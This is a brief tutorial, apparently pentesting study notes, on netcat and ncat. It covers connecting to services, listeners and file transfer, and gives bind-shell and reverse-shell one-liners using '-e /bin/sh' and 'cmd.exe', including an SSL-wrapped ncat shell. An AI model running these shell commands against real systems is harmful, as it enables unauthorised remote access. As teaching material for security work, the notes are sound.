Essential Tools - netcat & ncat (Part I)

Netcat

• Can connect in both TCP/UDP port
• Read service banner
• Connect to service manually

Basic Usage

Connect to POP3, suppres name/port resolutions, show all verbose response

nc -nv 10.0.0.1 110 # -n surpress default port resolution, -v verbose

Listen at localhost:4444 as Server

nc -lnvp 4444 #-l listen, -p port 
# mac version dont need -p flag
nc -lnv 4444 

connect to 10.0.0.1:4444 as Client

nc -nv 10.0.0.1 4444

Transfer Files

Listen at localhost:4444 as Server redirect as output

nc -lnvp 4444 > output

Connect to 10.0.0.1:4444 redirect as output

nc -nv 10.0.0.1 4444 < output

Listen as shell

Listen at localhost:4444 as Server & serve as shell

nc -nlvp 4444 -e cmd.exe # windows
nc -nlvp 4444 -e /bin/sh # linux

Connect as client

nc -nv 10.0.0.1 4444
# ls -la for linux example list directory
# dir    for windows example list directory

Reverse shell

Listen at localhost:4444 as Server

nc -lnvp 4444 #-l listen, -p port 
# mac version dont need -p flag
nc -lnv 4444 

connect to 10.0.0.1:4444 as Client

nc -nv 10.0.0.1 4444 -e /bin/sh # set the -e flag on client to redirect output

NCat

• Improved version of netcat with encryption/decryption features
• Pretty much the same, but more secure with --ssl flag
• more security related features

Ncat is not a pre-installed package in kali & mac, you may install it via apt-get install ncat or brew install ncat before continue.

Listen as shell

Listen at localhost:4444 as Server & serve as shell

ncat --ssl -vnlp 4444 -e /bin/sh 

Connect as client

ncat -v 10.0.0.1 4444 --ssl
# ls -la for linux example list directory
# dir    for windows example list directory